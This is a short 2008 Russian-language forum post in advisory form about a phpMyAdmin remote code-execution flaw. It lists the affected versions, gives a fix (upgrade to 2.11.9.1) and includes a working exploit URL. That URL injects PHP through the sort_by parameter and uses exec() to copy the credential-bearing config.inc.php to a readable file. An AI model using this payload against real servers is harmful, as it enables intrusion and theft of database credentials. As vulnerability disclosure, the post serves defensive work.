20.09.2008, 03:37
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Vulnerable:
Код:
Typo3 phpMyAdmin 3.2
Typo3 phpMyAdmin 3.0.1
Typo3 phpMyAdmin 3.0
Typo3 phpMyAdmin 0.2.2
Turbolinux Appliance Server 3.0 x64
Turbolinux Appliance Server 3.0
phpMyAdmin phpMyAdmin 2.11.9
phpMyAdmin phpMyAdmin 2.11.8
phpMyAdmin phpMyAdmin 2.11.7
phpMyAdmin phpMyAdmin 2.11.5 1
phpMyAdmin phpMyAdmin 2.11.5
phpMyAdmin phpMyAdmin 2.11.4
phpMyAdmin phpMyAdmin 2.11.1
phpMyAdmin phpMyAdmin 2.9.1
phpMyAdmin phpMyAdmin 2.9.2-rc1
phpMyAdmin phpMyAdmin 2.9.1.1
phpMyAdmin phpMyAdmin 2.11.8.1
phpMyAdmin phpMyAdmin 2.11.5.2
phpMyAdmin phpMyAdmin 2.11.2.2
phpMyAdmin phpMyAdmin 2.11.2.1
phpMyAdmin phpMyAdmin 2.11.1.2
phpMyAdmin phpMyAdmin 2.11.1.1
phpMyAdmin phpMyAdmin 2.10.0.2
phpMyAdmin phpMyAdmin 2.10.0.1
phpMyAdmin phpMyAdmin 2.10.0.1
Exploit:
Код:
http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]
Выполнение произвольного PHP-кода на сервере, включая вызов внешних команд через PHP-функцию exec().
Решение:
Upgrade to phpMyAdmin 2.11.9.1 or newer.
Not Vulnerable:
Код:
Typo3 phpMyAdmin 3.3
phpMyAdmin phpMyAdmin 2.11.9 .1
www.phpmyadmin.net
|
|
|